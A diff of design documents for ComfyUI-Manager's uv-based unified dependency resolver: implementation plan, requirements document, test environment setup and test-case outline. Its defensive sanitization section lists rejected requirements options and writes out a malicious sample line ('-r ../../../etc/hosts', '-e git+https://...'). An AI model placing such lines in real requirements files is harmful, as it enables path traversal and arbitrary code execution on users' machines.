| `subprocess` | uv process execution | Standard library |
| `dataclasses` | Result data structures | Standard library |
| `re` | Input sanitization, version spec parsing, credential redaction | Standard library |
| `shutil` | uv lookup (`which`), temp directory cleanup | Standard library |
| `time` | Stale temp file age calculation | Standard library |
| `logging` | Per-step logging | Standard library |
No additional external dependencies.
---
## 8. Sequence Diagram
### Install Time + Startup Batch Resolution
```mermaid
sequenceDiagram
actor User
participant MC as manager_core
participant PS as prestartup_script
participant UDR as UnifiedDepResolver
participant UV as uv (CLI)
Note over User,MC: Install Time (immediate)
User->>MC: Install node pack X
MC->>MC: Git clone / download X
MC->>MC: Skip per-node pip (unified mode)
MC->>MC: Run X's install.py
MC-->>User: Node pack installed (deps pending)
Note over User,UV: ComfyUI Restart
User->>PS: Start ComfyUI
PS->>PS: Check use_unified_resolver
PS->>UDR: Create resolver (module scope)
UDR->>UDR: collect_requirements()<br/>(ALL installed node packs)
UDR->>UV: uv pip compile --output-file
UV-->>UDR: pinned reqs.txt
UDR->>UV: uv pip install -r
UV-->>UDR: Install result
UDR-->>PS: ResolveResult(success=True)
PS->>PS: PIPFixer.fix_broken()
PS->>PS: execute_lazy_install_script()<br/>(install.py only, deps skipped)
PS-->>User: ComfyUI ready
```
---
## 9. Test Strategy
### 9.1 Unit Tests
| Test Target | Cases |
|------------|-------|
| `collect_requirements` | Normal parsing, empty file, blacklist filtering, comment handling, remap application |
| `.disabled` filtering | Exclude node packs within `.disabled/` directory path (directory-based mechanism) |
| Input sanitization | Reject lines with `-r`, `-e`, `--find-links`, `@ file://`, path separators |
| `--index-url` / `--extra-index-url` separation | `package --index-url URL`, standalone `--index-url URL`, standalone `--extra-index-url URL`, `package --extra-index-url URL` → package spec + extra_index_urls separation |
| Downgrade blacklist | Installed + lower version request → skip, not installed → pass, same/higher version → pass |
| `compile_lockfile` | Normal compilation, conflict detection, TimeoutExpired, constraint application, --output-file verification |
| Lockfile existence verification | Failure handling when file not created despite returncode==0 |
| `extra_index_urls` passthrough | Verify `--extra-index-url` argument included in compile command |
| `install_from_lockfile` | Normal install, total failure, TimeoutExpired |
| Atomic model | On failure: installed=[], stderr populated |
| `_get_uv_cmd` | Module uv, standalone uv, embedded python (`python_embeded`), not installed |
| `_remap_package` | pip_overrides remapping, unregistered packages |
| Blacklist | torch family, torchsde, custom blacklist |
| Duplicate handling | Same package with multiple specs → all passed to uv |
| Multiple paths | Collection from multiple custom_nodes paths |
| `cm_global` defense | Default values used when `pip_blacklist` etc. not assigned |
| Concurrency | Two resolver instances each use unique temp directories |
| Credential redaction | `user:pass@host` URL masked in log output |
| `_redact_url` | `://user:pass@host``://****@host` conversion, no-credential URL passthrough |
| `cleanup_stale_tmp` | Delete stale dirs >1 hour, preserve recent dirs, ignore permission errors |
| Downgrade operators | `<=`, `==`, `<`, `~=` blocked; `>=`, `>`, `!=` pass; no spec + installed → blocked |
| `StrictVersion` comparison | Verify `manager_util.StrictVersion` is used (not `packaging.version`) |
### 9.2 Integration Tests
- End-to-end test in real uv environment
- Existing pip fallback path test
- config.ini setting toggle test
- Environment integrity verification after PIPFixer call
- lazy_mode scheduling behavior verification (Windows simulation)
- `use_uv=False` + `use_unified_resolver=True` combination test
- Large-scale dependency (50+ node packs) performance test
---
## 10. Implementation Order
1. **Phase 1**: Data classes and `collect_requirements` implementation + tests
- PackageRequirement, CollectedDeps (including extra_index_urls) and other data classes
- Blacklist/override filtering
- **Downgrade blacklist** (version comparison logic included)
- **Input sanitization** (-r, -e, @ file:// etc. rejection)
- **`--index-url` / `--extra-index-url` separation handling** (package spec + extra_index_urls)
- **`.disabled` node pack filtering**
- Defensive cm_global access (getattr pattern)
2. **Phase 2**: `compile_lockfile` implementation + tests
- uv pip compile invocation
- --output-file, --constraint, --python options
- Conflict parsing logic
3. **Phase 3**: `install_from_lockfile` implementation + tests
- uv pip install -r invocation (NOT sync)
- Install result parsing
4. **Phase 4**: Integration — startup batch + install-time skip
- `prestartup_script.py`: Module-scope startup batch resolver + `execute_lazy_install_script()` deps skip
- `manager_core.py`: Skip per-node pip in 2 `execute_install_script()` locations
- `manager_util.py`: `use_unified_resolver` flag
- Config reading (`read_unified_resolver_mode()`, `read_config()`/`write_config()`)
5. **Phase 5**: Integration tests + fallback verification + startup batch tests
---
## Appendix A: Existing Code Reference
> **Note**: Line numbers may shift as code changes, so references use symbol names (function/class names).
> Use `grep -n` or IDE symbol search for exact locations.
### remap_pip_package Location (Code Duplication Exists)
```
comfyui_manager/glob/manager_core.py — def remap_pip_package(pkg)
comfyui_manager/prestartup_script.py — def remap_pip_package(pkg)
```
Both reference `cm_global.pip_overrides` with identical logic.
The unified resolver uses `cm_global.pip_overrides` directly to avoid adding more duplication.
### cm_global Global State
```python
# Dynamically assigned in prestartup_script.py (NOT defined in cm_global.py!)
cm_global.pip_blacklist = {'torch', 'torchaudio', 'torchsde', 'torchvision'} # set
cm_global.pip_overrides = {} # dict, loaded from JSON
cm_global.pip_downgrade_blacklist = [ # list
'torch', 'torchaudio', 'torchsde', 'torchvision',
'transformers', 'safetensors', 'kornia'
]
```
> **cm_cli path**: `cm_cli/__main__.py` also independently initializes these attributes.
> If the resolver may be called from the CLI path, this initialization should also be verified.
### PIPFixer Call Pattern
```python
# Within UnifiedManager.execute_install_script() method in manager_core.py:
pip_fixer = manager_util.PIPFixer(
manager_util.get_installed_packages(),
context.comfy_path,
context.manager_files_path
)
# ... (after installation)
pip_fixer.fix_broken()
```
The unified resolver does not call PIPFixer directly.
The caller (execute_install_script) calls PIPFixer as part of the existing flow.
### is_blacklisted() Logic (Must Be Reproduced in Unified Resolver)
```python
# manager_core.py — def is_blacklisted(name)
# 1. Simple pip_blacklist membership check
# 2. pip_downgrade_blacklist version comparison:
# - Parse spec with regex r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
# - match is None (no version spec) + installed → block
# - Operator in ['<=', '==', '<', '~='] + installed version >= requested version → block
# - Version comparison uses manager_util.StrictVersion (NOT packaging.version)
```
The unified resolver's `_is_downgrade_blacklisted()` method faithfully reproduces this logic.
It uses `manager_util.StrictVersion` instead of `packaging.version.parse()` to ensure consistency with existing behavior.
### Existing Code --index-url Handling (Asymmetric)
```python
# Only exists in standalone function execute_install_script():
if '--index-url' in package_name:
s = package_name.split('--index-url')
install_cmd = manager_util.make_pip_cmd(["install", s[0].strip(), '--index-url', s[1].strip()])
# UnifiedManager.execute_install_script() method does NOT have this handling
```
The unified resolver unifies both paths for consistent handling via `_split_index_url()`.

View File

@ -0,0 +1,363 @@
# PRD: Unified Dependency Resolver
## 1. Overview
### 1.1 Background
ComfyUI Manager currently installs each node pack's `requirements.txt` individually via `pip install`.
This approach causes dependency conflicts where installing a new node pack can break previously installed node packs' dependencies.
**Current flow:**
```mermaid
graph LR
A1[Install node pack A] --> A2[pip install A's deps] --> A3[Run install.py]
B1[Install node pack B] --> B2[pip install B's deps] --> B3[Run install.py]
B2 -.->|May break<br/>A's deps| A2
```
### 1.2 Goal
Implement a unified dependency installation module that uses `uv` to resolve all dependencies (installed node packs + new node packs) at once.
**New flow (unified resolver mode):**
```mermaid
graph TD
subgraph "Install Time (immediate)"
A1[User installs node pack X] --> A2[Git clone / download]
A2 --> A3["Run X's install.py (if exists)"]
A3 --> A4["Skip per-node pip install<br/>(deps deferred to restart)"]
end
subgraph "ComfyUI Restart (startup batch)"
B1[prestartup_script.py] --> B2[Collect ALL installed node packs' deps]
B2 --> B3["uv pip compile → pinned requirements.txt"]
B3 --> B4["uv pip install -r → Batch install"]
B4 --> B5[PIPFixer environment correction]
end
```
> **Terminology**: In this document, "lockfile" refers to the **pinned requirements.txt** generated by `uv pip compile`.
> This is different from the `uv.lock` (TOML format) generated by `uv lock`. We use a pip-compatible workflow.
### 1.3 Scope
- Develop a new dedicated dependency resolution module
- Opt-in activation from the existing install process
- **Handles dependency resolution (deps install) only**. `install.py` execution is handled by existing logic
---
## 2. Constraints
| Item | Description |
|------|-------------|
| **uv required** | Only operates in environments where `uv` is available |
| **Independent of `use_uv` flag** | `use_unified_resolver` is separate from the existing `use_uv` flag. Even if `use_uv=False`, setting `use_unified_resolver=True` attempts resolver activation. Auto-fallback if uv is not installed |
| **Pre-validated list** | Input node pack list is assumed to be pre-verified for mutual dependency compatibility |
| **Backward compatibility** | Existing pip-based install process is fully preserved (fallback) |
| **Blacklist/overrides bypassed** | In unified mode, `pip_blacklist`, `pip_overrides`, `pip_downgrade_blacklist` are NOT applied (empty values passed). Constructor interface is preserved for future extensibility. `uv pip compile` handles all conflict resolution natively. **[DEFERRED]** Reading actual values from `cm_global` at startup is deferred to a future version — v1 always passes empty values |
| **Multiple custom_nodes paths** | Supports all paths returned by `folder_paths.get_folder_paths('custom_nodes')` |
| **Scope of application** | Batch resolver runs at **module scope** in `prestartup_script.py` (unconditionally when enabled, independent of `install-scripts.txt` existence). The 2 `execute_install_script()` locations skip per-node pip install when unified mode is active (deps deferred to restart). `execute_lazy_install_script()` is also modified to skip per-node pip install in unified mode. Other install paths such as `install_manager_requirements()`, `pip_install()` are outside v1 scope (future extension) |
| **Legacy module** | `comfyui_manager/legacy/manager_core.py` is excluded from modification. Legacy paths retain existing pip behavior |
---
## 3. Functional Requirements
### FR-1: Node Pack List and Base Dependency Input
**Input:**
- Node pack list (fullpath list of installed + to-be-installed node packs)
- Base dependencies (ComfyUI's `requirements.txt` and `manager_requirements.txt`)
**Behavior:**
- Validate each node pack path
- Exclude disabled (`.disabled`) node packs
- Detection criteria: Existence of `custom_nodes/.disabled/{node_pack_name}` **directory**
- Existing mechanism: Disabling a node pack **moves** it from `custom_nodes/` to `custom_nodes/.disabled/` (does NOT create a `.disabled` file inside the node pack)
- At resolver input time, disabled node packs should already be absent from `custom_nodes/`, so normally they won't be in `node_pack_paths`
- Defensively exclude any node pack paths that are within the `.disabled` directory
- Base dependencies are treated as constraints
- Traverse all paths from `folder_paths.get_folder_paths('custom_nodes')`
**`cm_global` runtime dependencies:**
- `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are dynamically assigned during `prestartup_script.py` execution
- In unified mode, these are **not applied** — empty values are passed to the resolver constructor
- The constructor interface accepts these parameters for future extensibility (defaults to empty when `None`)
### FR-2: Dependency List Extraction
**Behavior:**
- Parse `requirements.txt` from each node pack directory
- Encoding: Use `robust_readlines()` pattern (`chardet` detection, assumes UTF-8 if not installed)
- Package name remapping (constructor accepts `overrides` dict — **empty in v1**, interface preserved for extensibility)
- Blacklist package filtering (constructor accepts `blacklist` set — **empty in v1**, uv handles torch etc. natively)
- Downgrade blacklist filtering (constructor accepts `downgrade_blacklist` list — **empty in v1**)
- **Note**: In unified mode, `uv pip compile` resolves all version conflicts natively. The blacklist/overrides/downgrade_blacklist mechanisms from the existing pip flow are bypassed
- Strip comments (`#`) and blank lines
- **Input sanitization** (see below)
- Separate handling of `--index-url` entries (see below)
**Input sanitization:**
- Requirements lines matching the following patterns are **rejected and logged** (security defense):
- `-r`, `--requirement` (recursive include → path traversal risk)
- `-e`, `--editable` (VCS/local path install → arbitrary code execution risk)
- `-c`, `--constraint` (external constraint file injection)
- `--find-links`, `-f` (external package source specification)
- `@ file://` (local file reference → path traversal risk)
- Package names containing path separators (`/`, `\`)
- Allowed items: Package specs (`name>=version`), specs with `--index-url`, environment markers (containing `;`)
- Rejected lines are recorded in the `skipped` list with reason
**`--index-url` handling:**
- Existing code (standalone function `execute_install_script()`) parses `package_name --index-url URL` format for special handling
- **Note**: The class method `UnifiedManager.execute_install_script()` does NOT have this handling (asymmetric)
- The unified resolver **unifies both paths** for consistent handling:
- Package spec → added to the general dependency list
- `--extra-index-url URL` → passed as `uv pip compile` argument
- Separated index URLs are collected in `CollectedDeps.extra_index_urls`
- **Credential redaction**: Authentication info (`user:pass@`) in index URLs is masked during logging
**Duplicate handling strategy:**
- No deduplication is performed directly
- Different version specs of the same package are **all passed as-is** to uv
- `uv pip compile` handles version resolution (uv determines the optimal version)
**Output:**
- Unified dependency list (tracked by source node pack)
- Additional index URL list
### FR-3: uv pip compile Execution
**Behavior:**
- Generate temporary requirements file from the collected dependency list
- Execute `uv pip compile` to produce a pinned requirements.txt
- `--output-file` (required): Specify output file (outputs to stdout only if not specified)
- `--constraint`: Pass base dependencies as constraints
- `--python`: Current Python interpreter path
- `--extra-index-url`: Additional index URLs collected from FR-2 (multiple allowed)
- Resolve for the current platform (platform-specific results)
**Error handling:**
- Return conflict package report when resolution fails
- Timeout handling (300s): Explicitly catch `subprocess.TimeoutExpired`, terminate child process, then fallback
- Lockfile output file existence verification: Confirm file was actually created even when `returncode == 0`
- Temp file cleanup: Guaranteed in `finally` block. Includes stale temp file cleanup logic at next execution for abnormal termination (SIGKILL) scenarios
**Output:**
- pinned requirements.txt (file with all packages pinned to exact versions)
### FR-4: Pinned Requirements-based Dependency Installation
**Behavior:**
- Execute `uv pip install -r <pinned-requirements.txt>`
- **Do NOT use `uv pip sync`**: sync deletes packages not in the lockfile, risking removal of torch, ComfyUI's own dependencies, etc.
- Already-installed packages at the same version are skipped (default uv behavior)
- Log installation results
**Error handling:**
- `uv pip install -r` is an **atomic operation** (all-or-nothing)
- On total failure: Parse stderr for failure cause report → fallback to existing pip
- **No partial failure report** (not possible due to uv's behavior)
- `InstallResult`'s `installed`/`skipped` fields are populated by parsing uv stdout; `stderr` records failure cause (no separate `failed` field needed due to atomic model)
### FR-5: Post-install Environment Correction
**Behavior:**
- Call `PIPFixer.fix_broken()` for environment integrity correction
- Restore torch version (when change detected)
- Fix OpenCV conflicts
- Restore comfyui-frontend-package
- Restore packages based on `pip_auto_fix.list`
- **This step is already performed in the existing `execute_install_script()` flow, so the unified resolver itself doesn't need to call it**
- However, an optional call option is provided for cases where the resolver is invoked independently outside the existing flow
### FR-6: install.py Execution (Existing Flow Maintained)
**Behavior:**
- The unified resolver handles deps installation **at startup time only**
- `install.py` execution is handled by the existing `execute_install_script()` flow and runs **immediately** at install time
- Deps are deferred to startup batch resolution; `install.py` runs without waiting for deps
**Control flow specification (unified mode active):**
- `execute_install_script()`: **skip** the `requirements.txt`-based individual pip install loop entirely (deps will be resolved at next restart)
- `install.py` execution runs **immediately** as before
- At next ComfyUI restart: `prestartup_script.py` runs the unified resolver for all installed node packs
**Control flow specification (unified mode inactive / fallback):**
- Existing pip install loop runs as-is (no change)
- `install.py` execution runs **immediately** as before
### FR-7: Startup Batch Resolution
**Behavior:**
- When `use_unified_resolver=True`, **all dependency resolution is deferred to ComfyUI startup**
- At install time: node pack itself is installed (git clone, etc.) and `install.py` runs immediately, but `requirements.txt` deps are **not** installed per-request
- At startup time: `prestartup_script.py` runs the unified resolver once for all installed node packs
**Startup execution flow (in `prestartup_script.py`):**
1. At **module scope** (before `execute_startup_script()` gate): check `manager_util.use_unified_resolver` flag
2. If enabled: collect all installed node pack paths, read base requirements from `comfy_path`
3. Create `UnifiedDepResolver` with empty blacklist/overrides/downgrade_blacklist (uv handles resolution natively)
4. Call `resolve_and_install()` — collects all deps → compile → install in one batch
5. On success: set `_unified_resolver_succeeded = True`, skip per-node pip in `execute_lazy_install_script()`
6. On failure: log warning, `execute_lazy_install_script()` falls back to existing per-node pip install
7. **Note**: Runs unconditionally when enabled, independent of `install-scripts.txt` existence
**`execute_install_script()` behavior in unified mode:**
- Skip the `requirements.txt` pip install loop entirely (deps will be handled at restart)
- `install.py` execution still runs immediately
**`execute_lazy_install_script()` behavior in unified mode:**
- Skip the `requirements.txt` pip install loop (already handled by startup batch resolver)
- `install.py` execution still runs
**Windows-specific behavior:**
- Windows lazy install path also benefits from startup batch resolution
- `try_install_script()` defers to `reserve_script()` as before for non-`instant_execution=True` installs
---
## 4. Non-functional Requirements
| Item | Requirement |
|------|-------------|
| **Performance** | Equal to or faster than existing individual installs |
| **Stability** | Must not break the existing environment |
| **Logging** | Log progress and results at each step (details below) |
| **Error recovery** | Fallback to existing pip method on failure |
| **Testing** | Unit test coverage above 80% |
| **Security** | requirements.txt input sanitization (see FR-2), credential log redaction, subprocess list-form invocation |
| **Concurrency** | Prevent lockfile path collisions on concurrent install requests. Use process/thread-unique suffixes or temp directories |
| **Temp files** | Guarantee temp file cleanup on both normal and abnormal termination. Clean stale files on next execution |
### Logging Requirements
| Step | Log Level | Content |
|------|-----------|---------|
| Resolver start | `INFO` | Node pack count, total dependency count, mode (unified/pip) |
| Dependency collection | `INFO` | Collection summary (collected N, skipped N, sources N) |
| Dependency collection | `DEBUG` | Per-package collection/skip/remap details |
| `--index-url` detection | `INFO` | Detected additional index URL list |
| uv compile start | `INFO` | Execution command (excluding sensitive info) |
| uv compile success | `INFO` | Pinned package count, elapsed time |
| uv compile failure | `WARNING` | Conflict details, fallback transition notice |
| Install start | `INFO` | Number of packages to install |
| Install success | `INFO` | Installed/skipped count summary, elapsed time |
| Install failure | `WARNING` | Failed package list, fallback transition notice |
| Fallback transition | `WARNING` | Transition reason, original error message |
| Overall completion | `INFO` | Final result summary (success/fallback/failure) |
> **Log prefix**: All logs use `[UnifiedDepResolver]` prefix to distinguish from existing pip install logs
---
## 5. Usage Scenarios
### Scenario 1: Single Node Pack Installation (unified mode)
```
User requests installation of node pack X
→ Git clone / download node pack X
→ Run X's install.py (if exists) — immediately
→ Skip per-node pip install (deps deferred)
→ User restarts ComfyUI
→ prestartup_script.py: Collect deps from ALL installed node packs (A,B,C,X)
→ uv pip compile resolves fully compatible versions
→ uv pip install -r for batch installation
→ PIPFixer environment correction
```
### Scenario 2: Multi Node Pack Batch Installation (unified mode)
```
User requests installation of node packs X, Y, Z
→ Each node pack: git clone + install.py — immediately
→ Per-node pip install skipped for all
→ User restarts ComfyUI
→ prestartup_script.py: Collect deps from ALL installed node packs (including X,Y,Z)
→ Single uv pip compile → single uv pip install -r
→ PIPFixer environment correction
```
### Scenario 3: Dependency Resolution Failure (Edge Case)
```
Even pre-validated lists may fail due to uv version differences or platform issues
→ uv pip compile failure → return conflict report
→ Display conflict details to user
→ Auto-execute existing pip fallback
```
### Scenario 4: uv Not Installed
```
uv unavailable detected → auto-fallback to existing pip method
→ Display uv installation recommendation to user
```
### Scenario 5: Windows Lazy Installation (unified mode)
```
Node pack installation requested on Windows
→ Node pack install deferred to startup (existing lazy mechanism)
→ On next ComfyUI startup: unified resolver runs first (batch deps)
→ execute_lazy_install_script() skips per-node pip (already resolved)
→ install.py still runs per node pack
```
### Scenario 6: Malicious/Non-standard requirements.txt
```
Node pack's requirements.txt contains `-r ../../../etc/hosts` or `-e git+https://...`
→ Sanitization filter rejects the line
→ Log rejection reason and continue processing remaining valid packages
→ Notify user of rejected item count
```
### Scenario 7: Concurrent Install Requests (unified mode)
```
User requests installation of node packs A and B nearly simultaneously from UI
→ Each request: git clone + install.py immediately, deps skipped
→ On restart: single unified resolver run handles both A and B deps together
→ No concurrency issue (single batch at startup)
```
---
## 6. Success Metrics
| Metric | Target |
|--------|--------|
| Dependency conflict reduction | 90%+ reduction compared to current |
| Install success rate | 99%+ (for compatibility-verified lists) |
| Performance | Equal to or better than existing individual installs |
| Adoption rate | 50%+ of eligible users |
---
## 7. Future Extensions
- ~~**`cm_global` integration** [DONE]: All `--uv-compile` CLI commands (`uv-compile`, `install`, `reinstall`, `update`, `fix`, `restore-snapshot`, `restore-dependencies`, `install-deps`) pass real `cm_global` values. Startup path (`prestartup_script.py`) still passes empty by design~~
- Lockfile caching: Reuse for identical node pack configurations
- Pre-install dependency conflict validation API: Check compatibility before installation
- Dependency tree visualization: Display dependency relationships to users
- `uv lock`-based cross-platform lockfile support (TOML format)
- `install_manager_requirements()` integration: Resolve manager's own dependencies through unified resolver
- `pip_install()` integration: Route UI direct installs through unified resolver
- Legacy module (`comfyui_manager/legacy/`) unified resolver support
---
## Appendix A: Existing Code Install Path Mapping
> This section is reference material to clarify the unified resolver's scope of application.
| Install Path | Location | v1 Applied | Notes |
|-------------|----------|------------|-------|
| `UnifiedManager.execute_install_script()` | `glob/manager_core.py` (method) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
| Standalone `execute_install_script()` | `glob/manager_core.py` (function) | ✅ Yes | Skips per-node pip in unified mode (deps deferred to restart) |
| `execute_lazy_install_script()` | `prestartup_script.py` | ✅ Yes | Skips per-node pip in unified mode (already batch-resolved) |
| Startup batch resolver | `prestartup_script.py` | ✅ Yes | **New**: Runs unified resolver once at startup for all node packs |
| `install_manager_requirements()` | `glob/manager_core.py` | ❌ No | Manager's own deps |
| `pip_install()` | `glob/manager_core.py` | ❌ No | UI direct install |
| Legacy `execute_install_script()` (2 locations) | `legacy/manager_core.py` | ❌ No | Legacy paths |
| `cm_cli uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Standalone CLI batch resolution (with `cm_global` values) |
| `cm_cli install --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after all installs |
| `cm_cli reinstall --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after all reinstalls; mutually exclusive with `--no-deps` |
| `cm_cli update --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped during updates, batch resolution after |
| `cm_cli fix --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped during dep fix, batch resolution after |
| `cm_cli restore-snapshot --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped during restore, batch resolution after |
| `cm_cli restore-dependencies --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after all node deps restored |
| `cm_cli install-deps --uv-compile` | `cm_cli/__main__.py` | ✅ Yes | Per-node pip skipped, batch resolution after deps-spec install |

View File

@ -0,0 +1,194 @@
# Test Environment Setup
Procedures for setting up a ComfyUI environment with ComfyUI-Manager installed for functional testing.
## Automated Setup (Recommended)
Three shell scripts in `tests/e2e/scripts/` automate the entire lifecycle:
```bash
# 1. Setup: clone ComfyUI, create venv, install deps, symlink Manager
E2E_ROOT=/tmp/e2e_test MANAGER_ROOT=/path/to/comfyui-manager-draft4 \
bash tests/e2e/scripts/setup_e2e_env.sh
# 2. Start: launches ComfyUI in background, blocks until ready
E2E_ROOT=/tmp/e2e_test bash tests/e2e/scripts/start_comfyui.sh
# 3. Stop: graceful SIGTERM → SIGKILL shutdown
E2E_ROOT=/tmp/e2e_test bash tests/e2e/scripts/stop_comfyui.sh
# 4. Cleanup
rm -rf /tmp/e2e_test
```
### Script Details
| Script | Purpose | Input | Output |
|--------|---------|-------|--------|
| `setup_e2e_env.sh` | Full environment setup (8 steps) | `E2E_ROOT`, `MANAGER_ROOT`, `COMFYUI_BRANCH` (default: master), `PYTHON` (default: python3) | `E2E_ROOT=<path>` on last line |
| `start_comfyui.sh` | Foreground-blocking launcher | `E2E_ROOT`, `PORT` (default: 8199), `TIMEOUT` (default: 120s) | `COMFYUI_PID=<pid> PORT=<port>` |
| `stop_comfyui.sh` | Graceful shutdown | `E2E_ROOT`, `PORT` (default: 8199) | — |
**Idempotent**: `setup_e2e_env.sh` checks for a `.e2e_setup_complete` marker file and skips setup if the environment already exists.
**Blocking mechanism**: `start_comfyui.sh` uses `tail -n +1 -f | grep -q -m1 'To see the GUI'` to block until ComfyUI is ready. No polling loop needed.
---
## Prerequisites
- Python 3.9+
- Git
- `uv` (install via `pip install uv` or [standalone](https://docs.astral.sh/uv/getting-started/installation/))
## Manual Setup (Reference)
For understanding or debugging, the manual steps are documented below. The automated scripts execute these same steps.
### 1. ComfyUI Clone
```bash
COMFY_ROOT=$(mktemp -d)/ComfyUI
git clone https://github.com/comfyanonymous/ComfyUI.git "$COMFY_ROOT"
cd "$COMFY_ROOT"
```
### 2. Virtual Environment
```bash
cd "$COMFY_ROOT"
uv venv .venv
source .venv/bin/activate # Linux/macOS
# .venv\Scripts\activate # Windows
```
### 3. ComfyUI Dependencies
```bash
# GPU (CUDA)
uv pip install -r requirements.txt --extra-index-url https://download.pytorch.org/whl/cu121
# CPU only (lightweight, for functional testing)
uv pip install -r requirements.txt --extra-index-url https://download.pytorch.org/whl/cpu
```
### 4. ComfyUI-Manager Install (Development)
```bash
# MANAGER_ROOT = comfyui-manager-draft4 repository root
MANAGER_ROOT=/path/to/comfyui-manager-draft4
# Editable install from current source
uv pip install -e "$MANAGER_ROOT"
```
> **Note**: Editable mode (`-e`) reflects code changes without reinstalling.
> For production-like testing, use `uv pip install "$MANAGER_ROOT"` (non-editable).
### 5. Symlink Manager into custom_nodes
```bash
ln -s "$MANAGER_ROOT" "$COMFY_ROOT/custom_nodes/ComfyUI-Manager"
```
### 6. Write config.ini
```bash
mkdir -p "$COMFY_ROOT/user/__manager"
cat > "$COMFY_ROOT/user/__manager/config.ini" << 'EOF'
[default]
use_uv = true
use_unified_resolver = true
EOF
```
> **IMPORTANT**: The config path is `$COMFY_ROOT/user/__manager/config.ini`, resolved by `folder_paths.get_system_user_directory("manager")`. It is NOT inside the symlinked Manager directory.
### 7. HOME Isolation
```bash
export HOME=/tmp/e2e_home
mkdir -p "$HOME/.config" "$HOME/.local/share"
```
### 8. ComfyUI Launch
```bash
cd "$COMFY_ROOT"
PYTHONUNBUFFERED=1 python main.py --enable-manager --cpu --port 8199
```
| Flag | Purpose |
|------|---------|
| `--enable-manager` | Enable ComfyUI-Manager (disabled by default) |
| `--cpu` | Run without GPU (for functional testing) |
| `--port 8199` | Use non-default port to avoid conflicts |
| `--enable-manager-legacy-ui` | Enable legacy UI (optional) |
| `--listen` | Allow remote connections (optional) |
### Key Directories
| Directory | Path | Description |
|-----------|------|-------------|
| ComfyUI root | `$COMFY_ROOT/` | ComfyUI installation root |
| Manager data | `$COMFY_ROOT/user/__manager/` | Manager config, startup scripts, snapshots |
| Config file | `$COMFY_ROOT/user/__manager/config.ini` | Manager settings (`use_uv`, `use_unified_resolver`, etc.) |
| custom_nodes | `$COMFY_ROOT/custom_nodes/` | Installed node packs |
> The Manager data path is resolved via `folder_paths.get_system_user_directory("manager")`.
> Printed at startup: `** ComfyUI-Manager config path: <path>/config.ini`
### Startup Sequence
When Manager loads successfully, the following log lines appear:
```
[PRE] ComfyUI-Manager # prestartup_script.py executed
[START] ComfyUI-Manager # manager_server.py loaded
```
The `Blocked by policy` message for Manager in custom_nodes is **expected** — `should_be_disabled()` in `comfyui_manager/__init__.py` prevents legacy double-loading when Manager is already pip-installed.
---
## Caveats & Known Issues
### PYTHONPATH for `comfy` imports
ComfyUI's `comfy` package is a **local package** inside the ComfyUI directory — it is NOT pip-installed. Any code that imports from `comfy` (including `comfyui_manager.__init__`) requires `PYTHONPATH` to include the ComfyUI directory:
```bash
PYTHONPATH="$COMFY_ROOT" python -c "import comfy"
PYTHONPATH="$COMFY_ROOT" python -c "import comfyui_manager"
```
The automated scripts handle this via `PYTHONPATH` in verification checks and the ComfyUI process inherits it implicitly by running from the ComfyUI directory.
### config.ini path
The config file must be at `$COMFY_ROOT/user/__manager/config.ini`, **NOT** inside the Manager symlink directory. This is resolved by `folder_paths.get_system_user_directory("manager")` at `prestartup_script.py:65-73`.
### Manager v4 endpoint prefix
All Manager endpoints use the `/v2/` prefix (e.g., `/v2/manager/queue/status`, `/v2/snapshot/get_current`). Paths without the prefix will return 404.
### `Blocked by policy` is expected
When Manager detects that it's loaded as a custom_node but is already pip-installed, it prints `Blocked by policy` and skips legacy loading. This is intentional behavior in `comfyui_manager/__init__.py:39-51`.
### Bash `((var++))` trap
Under `set -e`, `((var++))` with `var=0` evaluates to the pre-increment value (0), and an arithmetic expression that evaluates to 0 returns exit code 1, killing the script. Use `var=$((var + 1))` instead.
### `git+https://` URLs in requirements.txt
Some node packs (e.g., Impact Pack's SAM2 dependency) use `git+https://github.com/...` URLs. The unified resolver correctly rejects these with "rejected path separator" — they must be installed separately.
---
## Cleanup
```bash
deactivate
rm -rf "$COMFY_ROOT"
```

View File

@ -0,0 +1,788 @@
# Test Cases: Unified Dependency Resolver
See [TEST-environment-setup.md](TEST-environment-setup.md) for environment setup.
## Enabling the Resolver
Add the following to `config.ini` (in the Manager data directory):
```ini
[default]
use_unified_resolver = true
```
> Config path: `$COMFY_ROOT/user/__manager/config.ini`
> Also printed at startup: `** ComfyUI-Manager config path: <path>/config.ini`
**Log visibility note**: `[UnifiedDepResolver]` messages are emitted via Python's `logging` module (INFO and WARNING levels), not `print()`. Ensure the logging level is set to INFO or lower. ComfyUI defaults typically show these, but if messages are missing, check that the root logger or the `ComfyUI-Manager` logger is not set above INFO.
## API Reference (for Runtime Tests)
Node pack installation at runtime uses the task queue API:
```
POST http://localhost:8199/v2/manager/queue/task
Content-Type: application/json
```
> **Port**: E2E tests use port 8199 to avoid conflicts with running ComfyUI instances. Replace with your actual port if different.
**Payload** (`QueueTaskItem`):
| Field | Type | Description |
|-------|------|-------------|
| `ui_id` | string | Unique task identifier (any string) |
| `client_id` | string | Client identifier (any string) |
| `kind` | `OperationType` enum | `"install"`, `"uninstall"`, `"update"`, `"update-comfyui"`, `"fix"`, `"disable"`, `"enable"`, `"install-model"` |
| `params` | object | Operation-specific parameters (see below) |
**Install params** (`InstallPackParams`):
| Field | Type | Description |
|-------|------|-------------|
| `id` | string | CNR node pack ID (e.g., `"comfyui-impact-pack"`) or `"author/repo"` |
| `version` | string | Required by the request model. Set to the same value as `selected_version`. |
| `selected_version` | string | **Controls install target**: `"latest"`, `"nightly"`, or specific semver |
| `mode` | string | `"remote"`, `"local"`, or `"cache"` |
| `channel` | string | `"default"`, `"recent"`, `"legacy"`, etc. |
> **Note**: `cm_cli` supports unified resolver via `cm_cli uv-compile` (standalone) and
> `cm_cli install --uv-compile` (install-time batch resolution). Without `--uv-compile`,
> installs use per-node pip via `legacy/manager_core.py`.
---
## Out of Scope (Deferred)
The following are intentionally **not tested** in this version:
